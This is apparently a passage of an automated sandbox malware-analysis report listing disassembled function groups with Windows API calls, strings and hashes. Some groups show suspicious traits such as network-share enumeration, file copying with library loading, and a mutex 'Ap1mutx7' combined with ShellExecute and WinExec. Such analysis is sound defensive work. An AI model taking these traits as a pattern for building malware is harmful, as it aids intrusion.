                                    • MulDiv.KERNEL32(3FFF0000,?,00007FFF), ref: 0042FDF7
                                    • MulDiv.KERNEL32(00000000,?,00007FFF), ref: 0042FE06
                                    • EndPath.GDI32(?), ref: 0042FE21
                                    • PathToRegion.GDI32(?), ref: 0042FE2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Path$Window$BeginRectRegion
                                    • String ID: gfff$gfff$pTL
                                    • API String ID: 3989698161-546689930
                                    • Opcode ID: 53ff30b8afcf959ba32288bc20e96f9b3c8a69a1df0bc66d8397b847de262d70
                                    • Instruction ID: 61a35dbe99ab616be562730d7d2f4250fff31fc39792d817c3fc65f26dae67e0
                                    • Opcode Fuzzy Hash: 53ff30b8afcf959ba32288bc20e96f9b3c8a69a1df0bc66d8397b847de262d70
                                    • Instruction Fuzzy Hash: 9E81E0B16043419FC714DF25DC85E6BBBE8EBD9704F48893EF48683290DB78A909CB56
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 02424C38
                                    • lstrlen.KERNEL32(00000000), ref: 02424C45
                                    • lstrcat.KERNEL32(00000000,024A55C8), ref: 02424C64
                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 02424C97
                                    • lstrcat.KERNEL32(00000000,?), ref: 02424D05
                                      • Part of subcall function 02425BE5: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 02425C17
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000), ref: 02425C21
                                      • Part of subcall function 02425BE5: lstrcat.KERNEL32(00000000,024A55F4), ref: 02425C3D
                                      • Part of subcall function 02425BE5: lstrcpy.KERNEL32(00000000,00000000), ref: 02425C5A
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000,024A41D4,00000000), ref: 02425C88
                                      • Part of subcall function 02425BE5: wsprintfA.USER32 ref: 02425C94
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 02424D2A
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 02424D3F
                                    • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 02424D5F
                                    • GlobalFree.KERNEL32(?), ref: 02424D82
                                    • GetProcAddress.KERNEL32(00000000,024A3BEC), ref: 02424D95
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
                                    • String ID:
                                    • API String ID: 1023114332-0
                                    • Opcode ID: 0e4c100697e7e7e90178251300ccf5309f8d879b79291a2d00e713789f56f091
                                    • Instruction ID: eb2e36be87dc3d877f217b81b4caaa7ab55f4f07298d2cf9b2e2978c31e5eb1f
                                    • Opcode Fuzzy Hash: 0e4c100697e7e7e90178251300ccf5309f8d879b79291a2d00e713789f56f091
                                    • Instruction Fuzzy Hash: EEB12C70900229AFDB64DFA5DC88BEEB7B5FB48304F1085D9E50AA7240D734AA85CF50
                                    APIs
                                    • GetModuleHandleA.KERNEL32(USER32,00000000,-00000024,753D4A40,004A9CBB,?,?,?,?,?,?,?,004BFEA5,00000000,00000002,00000028), ref: 004A9BA4
                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 004A9BBC
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 004A9BCD
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004A9BDE
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004A9BEF
                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 004A9C00
                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004A9C11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                    • API String ID: 667068680-2376520503
                                    • Opcode ID: e5d5d1f69fab0b17f45f0b6bb4eefafae162806b55feb7efad9174a4f355ade1
                                    • Instruction ID: 1f53a15bfc6d92f99bc7c3d61e83e554414ccc8485ee9baa28f01de541fecce2
                                    • Opcode Fuzzy Hash: e5d5d1f69fab0b17f45f0b6bb4eefafae162806b55feb7efad9174a4f355ade1
                                    • Instruction Fuzzy Hash: 4811B6B0D006119A87105F26AEC08AEBEE1F71E760758953FF004D7260CF7889C18B64
                                    APIs
                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 004300EE
                                    • GetClientRect.USER32(?,?), ref: 00430189
                                    • CreateRectRgn.GDI32 ref: 004301FA
                                    • CombineRgn.GDI32(?,?,004DD0DC,00000004), ref: 0043022B
                                    • SetRect.USER32(?,00000000,?,?,?), ref: 00430282
                                    • IntersectRect.USER32(?,?,?), ref: 0043028F
                                    • IsRectEmpty.USER32(?), ref: 004302BA
                                    • __ftol.LIBCMT ref: 00430398
                                    • __ftol.LIBCMT ref: 004303A5
                                    • CreateRectRgn.GDI32(00000000,?,00000000,00000000), ref: 004303FE
                                    • CombineRgn.GDI32(?,?,004DD0DC,00000004), ref: 0043042F
                                      • Part of subcall function 0043A5C0: SetStretchBltMode.GDI32(?,00000000), ref: 0043A5D4
                                      • Part of subcall function 0043A5C0: GetObjectA.GDI32(?,00000018,?), ref: 0043A6B2
                                    • FillRgn.GDI32(?,?,00000000), ref: 004304AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Create$Combine__ftol$ClientEmptyFillIntersectModeObjectStretch
                                    • String ID: pTL
                                    • API String ID: 2054119908-168633513
                                    • Opcode ID: 44a4116cd90188d78f8853082c170a7996fbb5297af962c5201967ee3bc6fb8a
                                    • Instruction ID: a2fce783a00ac98e15997765672e2f41d574a02cf86a869b39acea016fb9cca3
                                    • Opcode Fuzzy Hash: 44a4116cd90188d78f8853082c170a7996fbb5297af962c5201967ee3bc6fb8a
                                    • Instruction Fuzzy Hash: 0DD18B71508340AFC714CF29C894E6BBBE8FBD8354F188A1EF89993251DB34E905CB66
                                    APIs
                                    • GetStockObject.GDI32(0000000F), ref: 00437E44
                                    • GetObjectA.GDI32(?,00000018,?), ref: 00437E57
                                    • GlobalAlloc.KERNEL32(00000002,00000028), ref: 00437EC6
                                    • GlobalFix.KERNEL32(00000000), ref: 00437EE4
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000000,00000000), ref: 00437F13
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00437F69
                                    • GlobalReAlloc.KERNEL32(00000000,?,00000002), ref: 00437F72
                                    • GlobalFix.KERNEL32(00000000), ref: 00437F7F
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000000,00000000), ref: 00437FA2
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00437FBC
                                    • GlobalFree.KERNEL32(00000000), ref: 00437FC3
                                      • Part of subcall function 004C2EEE: __EH_prolog.LIBCMT ref: 004C2EF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Global$AllocBitsObjectWire$FreeH_prologStock
                                    • String ID: (
                                    • API String ID: 1902819324-3887548279
                                    • Opcode ID: 4ee581e3124c917d655d38198055d8af94be161692f1b4bef99daecbca818913
                                    • Instruction ID: d3f1502440893c6c9632f1d6f1ceb6540657238b1813271e12b6ea55dc063580
                                    • Opcode Fuzzy Hash: 4ee581e3124c917d655d38198055d8af94be161692f1b4bef99daecbca818913
                                    • Instruction Fuzzy Hash: 706147B65083409FC360DF54CC45F6BBBE8FB88B10F14492DFA8597290DB78A805CBA6
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0045177B
                                    • CreateSemaphoreA.KERNEL32(00000000,00000014,00000014,00000000), ref: 00451790
                                    • RtlInitializeCriticalSection.NTDLL(?), ref: 004517BB
                                    • CreateThread.KERNEL32(00000000,00000000,004519F0,?,00000004,?), ref: 004517F0
                                    • RtlEnterCriticalSection.NTDLL(005DFE00), ref: 00451802
                                    • RtlLeaveCriticalSection.NTDLL(005DFE00), ref: 004519B5
                                    • ResumeThread.KERNEL32(?), ref: 004519C3
                                    • ReleaseSemaphore.KERNEL32(?,00000014,00000000), ref: 004519D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateCriticalSection$SemaphoreThread$EnterEventInitializeLeaveReleaseResume
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1802393137-4212202414
                                    • Opcode ID: c82d0244857dd576a1e991a73c2c5af32e02a0448dbc881dee9be541b6a247a4
                                    • Instruction ID: 32bb62c2118d6c7ff621b82de89de6f3551add73c7cfa4e74e4189c6e57df254
                                    • Opcode Fuzzy Hash: c82d0244857dd576a1e991a73c2c5af32e02a0448dbc881dee9be541b6a247a4
                                    • Instruction Fuzzy Hash: 2FB1E5B1A003005BD724DB65DC81B2B77D5FB98309F08462FFD46973A2E678E909CB99
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Parent$ActiveChildEnabledFocusUpdateVisible
                                    • String ID:
                                    • API String ID: 983273251-0
                                    • Opcode ID: 1c20adb9caf01d9e8c238c7a2cbd8fc9a3ba447d8fbb9d2d46212052c683f63f
                                    • Instruction ID: d0ee7b405dc84d6758ee9607d333bf151f78701b95fbc3be30bf4e304a655365
                                    • Opcode Fuzzy Hash: 1c20adb9caf01d9e8c238c7a2cbd8fc9a3ba447d8fbb9d2d46212052c683f63f
                                    • Instruction Fuzzy Hash: 4051A071A003059BD724AF71DC80A6BBBA8BF58344F14592FF95697220DB38E845CBA9
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 00418D67
                                    • GetClientRect.USER32(?,?), ref: 00418D7F
                                    • InflateRect.USER32(?,?,?), ref: 00418E3D
                                    • IntersectRect.USER32(?,?,?), ref: 00418EA7
                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 00418EC1
                                    • FillRgn.GDI32(?,?,?), ref: 00419080
                                    • GetCurrentObject.GDI32(?,00000006), ref: 004190FF
                                      • Part of subcall function 004C273C: GetStockObject.GDI32(?), ref: 004C2745
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C275F
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C276A
                                    • OffsetRect.USER32(?,00000001,00000001), ref: 004191DD
                                    • OffsetRect.USER32(?,00000002,00000002), ref: 00419271
                                    • OffsetRect.USER32(?,00000001,00000001), ref: 00419224
                                      • Part of subcall function 004C290C: SetTextColor.GDI32(?,?), ref: 004C2926
                                      • Part of subcall function 004C290C: SetTextColor.GDI32(?,?), ref: 004C2934
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Object$Offset$ColorSelectText$BeginClientClipCreateCurrentEmptyFillH_prologInflateIntersectPaintStock
                                    • String ID: pTL
                                    • API String ID: 4264835570-168633513
                                    • Opcode ID: 3303dbe5808f1e1d2dc937c74ae9933ff0448913140c14c8b12f8b9b1a5c502d
                                    • Instruction ID: f97c57c7c19acf09dc4ff5a4ad2a4a190b462773c5fb80a7c02beeea03b1015a
                                    • Opcode Fuzzy Hash: 3303dbe5808f1e1d2dc937c74ae9933ff0448913140c14c8b12f8b9b1a5c502d
                                    • Instruction Fuzzy Hash: C20267715083819FD324DF65C894FABB7E9BBC8304F004D1EF19687280DBB8A989CB56
                                    APIs
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    • GetParent.USER32(?), ref: 004BFDE8
                                    • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004BFE0B
                                    • GetWindowRect.USER32(?,?), ref: 004BFE24
                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 004BFE37
                                    • CopyRect.USER32(?,?), ref: 004BFE84
                                    • CopyRect.USER32(?,?), ref: 004BFE8E
                                    • GetWindowRect.USER32(00000000,?), ref: 004BFE97
                                    • CopyRect.USER32(?,?), ref: 004BFEB3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                    • String ID:
                                    • API String ID: 808654186-0
                                    • Opcode ID: b105c7b58090c70c13095b95fd611205e4fa4000bdee4713b06382bce92b112b
                                    • Instruction ID: 0a829d4510f065a4fbfcf7b71b24c7ca1c80583a57a4d4a66b8abc37c7531c91
                                    • Opcode Fuzzy Hash: b105c7b58090c70c13095b95fd611205e4fa4000bdee4713b06382bce92b112b
                                    • Instruction Fuzzy Hash: 70515072900219ABDB14DBA8DC85EFEBBBDAB44314F15413AF505F3291D734ED0A8B68
                                    APIs
                                    • InflateRect.USER32(?,?,?), ref: 00439826
                                      • Part of subcall function 00439550: SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00439639
                                      • Part of subcall function 00439550: OffsetRect.USER32(?,?,?), ref: 00439646
                                      • Part of subcall function 00439550: IntersectRect.USER32(?,?,?), ref: 00439662
                                      • Part of subcall function 00439550: IsRectEmpty.USER32(?), ref: 0043966D
                                    • InflateRect.USER32(?,?,?), ref: 00439899
                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00439A9D
                                    • GetClipRgn.GDI32(?,00000000), ref: 00439AAC
                                    • CreatePolygonRgn.GDI32 ref: 00439B2A
                                    • SelectClipRgn.GDI32(?,?), ref: 00439C0D
                                    • CreatePolygonRgn.GDI32(?,00000005,00000002), ref: 00439C30
                                    • SelectClipRgn.GDI32(?,?), ref: 00439CB1
                                    • DeleteObject.GDI32(?), ref: 00439CC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ClipCreate$InflatePolygonSelect$DeleteEmptyIntersectObjectOffset
                                    • String ID: gfff$pTL
                                    • API String ID: 1105800552-1168745580
                                    • Opcode ID: e0353ef053410e9e3b50c25c9f7ca320606756af5b356f3d7af950faf814cbbe
                                    • Instruction ID: ef252ab02b5c95fa58538530cb9db51aa8131feb03557d80647900f4c7aa7c8f
                                    • Opcode Fuzzy Hash: e0353ef053410e9e3b50c25c9f7ca320606756af5b356f3d7af950faf814cbbe
                                    • Instruction Fuzzy Hash: 7EF125B46083419FD364CF29C980B6BBBE5BFC8304F148A2EF99987351DB74A905CB56
                                    APIs
                                    • Sleep.KERNEL32(00000400), ref: 0242C8D1
                                    • WNetOpenEnumA.MPR(00000002,00000000,00000000,?,00000000), ref: 0242C8E5
                                    • GlobalAlloc.KERNEL32(00000040,00007F80), ref: 0242C916
                                    • WNetEnumResourceA.MPR(00000000,FFFFFFFF,?,00008000), ref: 0242C94E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 0242C9C5
                                    • CharUpperA.USER32(?), ref: 0242C9CF
                                    • lstrcat.KERNEL32(?,024A5668), ref: 0242C9DE
                                    • lstrlen.KERNEL32(?,?), ref: 0242C9EC
                                    • Sleep.KERNEL32(00001000), ref: 0242CA18
                                    • GetLastError.KERNEL32 ref: 0242CA25
                                    • Sleep.KERNEL32(00002000), ref: 0242CA39
                                    • GlobalFree.KERNEL32(?), ref: 0242CA48
                                    • WNetCloseEnum.MPR(00000000), ref: 0242CA52
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnumSleep$Global$AllocCharCloseErrorFreeLastOpenResourceUpperlstrcatlstrcpylstrlen
                                    • String ID:
                                    • API String ID: 904141561-0
                                    • Opcode ID: e8da61fa2c637a7ab5fa75f1d3e7a4fb0ca6fe05b6e201892f28131d5b268a99
                                    • Instruction ID: d596a3499b39c6180e7c707b1c41ad4678cebe788090d431a7d1ad0438f6f617
                                    • Opcode Fuzzy Hash: e8da61fa2c637a7ab5fa75f1d3e7a4fb0ca6fe05b6e201892f28131d5b268a99
                                    • Instruction Fuzzy Hash: 2C517DB1E40218EFDB14CF99D888BEEBBB5FB48315F10820AE115AB280C7759949CB64
                                    APIs
                                    • SelectObject.GDI32(00000000,?), ref: 0043A236
                                    • SelectObject.GDI32(?,00000000), ref: 0043A259
                                    • SelectObject.GDI32(00000000,?), ref: 0043A285
                                    • DeleteDC.GDI32(00000000), ref: 0043A292
                                    • SelectObject.GDI32(?,?), ref: 0043A29A
                                    • DeleteDC.GDI32(?), ref: 0043A2A1
                                    • DeleteObject.GDI32(?), ref: 0043A2A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Object$Select$Delete
                                    • String ID: $($(
                                    • API String ID: 4028988585-3669016180
                                    • Opcode ID: 84010494b92e2d4ec0b616076e4817eaab529cd69971b5885d18670a8ca05a65
                                    • Instruction ID: d1ca26a986cc5534642cb4579912b8a77033c4e4274c8961244b6a1e09a3a350
                                    • Opcode Fuzzy Hash: 84010494b92e2d4ec0b616076e4817eaab529cd69971b5885d18670a8ca05a65
                                    • Instruction Fuzzy Hash: 6AD156B1A043019FC714CF29D884A6BBBE9EFC8310F14892EF99687360D775E855CB66
                                    APIs
                                    • CreateSolidBrush.GDI32(00FFFFFF), ref: 0043705F
                                    • GetWindowRect.USER32(?), ref: 00437089
                                    • GetStockObject.GDI32(00000005), ref: 004370B7
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004370C5
                                    • GetWindowRect.USER32(?,?), ref: 00437133
                                    • GetWindowRect.USER32(?,?), ref: 00437144
                                    • GetWindowRect.USER32(?,?), ref: 00437159
                                    • GetSystemMetrics.USER32(00000001), ref: 0043716F
                                    • GetWindowRect.USER32(?,?), ref: 004371FA
                                    • OffsetRect.USER32(?,00000000,00000001), ref: 00437214
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$BrushCreateCursorLoadMetricsObjectOffsetSolidStockSystem
                                    • String ID: |TL
                                    • API String ID: 3805611468-51895757
                                    • Opcode ID: 560b82dc4401b8dfe4325c3d7a1f830f424f40ef0e9304d60ef2aa10be282a06
                                    • Instruction ID: 5ca792eb847d3b0c60dd0cb7fba0033e7a17ad577bd9e077365da9ae2d4dde6a
                                    • Opcode Fuzzy Hash: 560b82dc4401b8dfe4325c3d7a1f830f424f40ef0e9304d60ef2aa10be282a06
                                    • Instruction Fuzzy Hash: DDA1C2B0604701AFD764DF75C895F6FB7E5AB88708F00892EF19A87381DB78E8058B59
                                    APIs
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,?), ref: 0041DD18
                                    • lstrcat.KERNEL32(?,\shell\open\command), ref: 0041DD57
                                    • lstrlen.KERNEL32(?), ref: 0041DDAC
                                    • lstrcat.KERNEL32(00000000,005BDD2C), ref: 0041DDF5
                                    • lstrcat.KERNEL32(00000000,?), ref: 0041DDFD
                                    • WinExec.KERNEL32(?,?), ref: 0041DE05
                                      • Part of subcall function 004BC4B3: InterlockedDecrement.KERNEL32 ref: 004BC4C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: lstrcat$DecrementExecExecuteInterlockedShelllstrlen
                                    • String ID: "%1"$.htm$\shell\open\command$mailto:$open
                                    • API String ID: 51986957-2182632014
                                    • Opcode ID: 1f5596301d1e255cda7ced775cb7d5b6727dd359c1e3f2316bbe3641ffe6d6e3
                                    • Instruction ID: 4d22f93144f8ae5cda70eaebec58e74259e7cc7f1d63d8bbf3479efef72a1653
                                    • Opcode Fuzzy Hash: 1f5596301d1e255cda7ced775cb7d5b6727dd359c1e3f2316bbe3641ffe6d6e3
                                    • Instruction Fuzzy Hash: 46411672644312AFC324DB25DC80FEBB7A4AF94714F004D2EF99193280E778E944CBA6
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,04311778,000001FE), ref: 043101D5
                                    • LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 043101F4
                                    • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 04310202
                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0431022F
                                    • GetLastError.KERNEL32(00000000), ref: 04310236
                                    • Sleep.KERNEL32(000927C0), ref: 04310245
                                    • ExitProcess.KERNEL32(00000000), ref: 0431024D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3828792979.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_4310000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                    • API String ID: 1721171764-1163154406
                                    • Opcode ID: e21da19acf43ca4be23f49ad3665f7bddf3231c6d67d13a3599f374a33d2e894
                                    • Instruction ID: 85f07ec8803fc116bee59f2f182fe2b5852f9e0589b90e025695cb05139443cd
                                    • Opcode Fuzzy Hash: e21da19acf43ca4be23f49ad3665f7bddf3231c6d67d13a3599f374a33d2e894
                                    • Instruction Fuzzy Hash: 7E11E171244389ABEF14DEE08D4DFDD3769AF44B01F445415FA09EE0E0DBB5A244876B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 300c2bd71ca31407ed927988580ab82969ac675845b0dc258b5f6de17a1d5f15
                                    • Instruction ID: 873fd80c3cc1e43b675f06b06f658653319968fb3668e8a714bae1d7777c0225
                                    • Opcode Fuzzy Hash: 300c2bd71ca31407ed927988580ab82969ac675845b0dc258b5f6de17a1d5f15
                                    • Instruction Fuzzy Hash: 9DD17D756157009FD720CF24C881EABB7E5FB84358F244A2EE19AC7790E738E881CB59
                                    APIs
                                      • Part of subcall function 0043A180: SelectObject.GDI32(00000000,?), ref: 0043A236
                                      • Part of subcall function 0043A180: SelectObject.GDI32(?,00000000), ref: 0043A259
                                      • Part of subcall function 0043A180: SelectObject.GDI32(00000000,?), ref: 0043A285
                                      • Part of subcall function 0043A180: DeleteDC.GDI32(00000000), ref: 0043A292
                                      • Part of subcall function 0043A180: SelectObject.GDI32(?,?), ref: 0043A29A
                                      • Part of subcall function 0043A180: DeleteDC.GDI32(?), ref: 0043A2A1
                                    • __ftol.LIBCMT ref: 004194F5
                                    • __ftol.LIBCMT ref: 00419502
                                    • CreateRectRgn.GDI32(00000000,?,00000000,?), ref: 00419574
                                    • CombineRgn.GDI32(?,?,004DC338,00000004), ref: 0041959A
                                    • SetRect.USER32(?,00000000,?,?,?), ref: 004195E6
                                    • IntersectRect.USER32(?,?,?), ref: 004195FE
                                    • IsRectEmpty.USER32(?), ref: 00419629
                                    • CreateRectRgn.GDI32(00000000,?,?,00000000), ref: 004196CE
                                    • CombineRgn.GDI32(?,?,004DC338,00000004), ref: 004196F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ObjectSelect$CombineCreateDelete__ftol$EmptyIntersect
                                    • String ID: pTL
                                    • API String ID: 1957208593-168633513
                                    • Opcode ID: e69314494a573abb83df45538d9da15f45cf10d231d30dfcf35bc7a04d6c5d6c
                                    • Instruction ID: 5b57430de4f51f61671cab0d043c128a42f67b78ab7e2f3821ded82c6cae64ba
                                    • Opcode Fuzzy Hash: e69314494a573abb83df45538d9da15f45cf10d231d30dfcf35bc7a04d6c5d6c
                                    • Instruction Fuzzy Hash: FCA18C716083419FC724CF69C894A9BBBE9FFC8344F548A2DF5A583290EB74E844CB56
                                    APIs
                                    • GetStockObject.GDI32(00000005), ref: 004169D9
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004169E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorLoadObjectStock
                                    • String ID: _EL_Tab
                                    • API String ID: 3794545487-2917575613
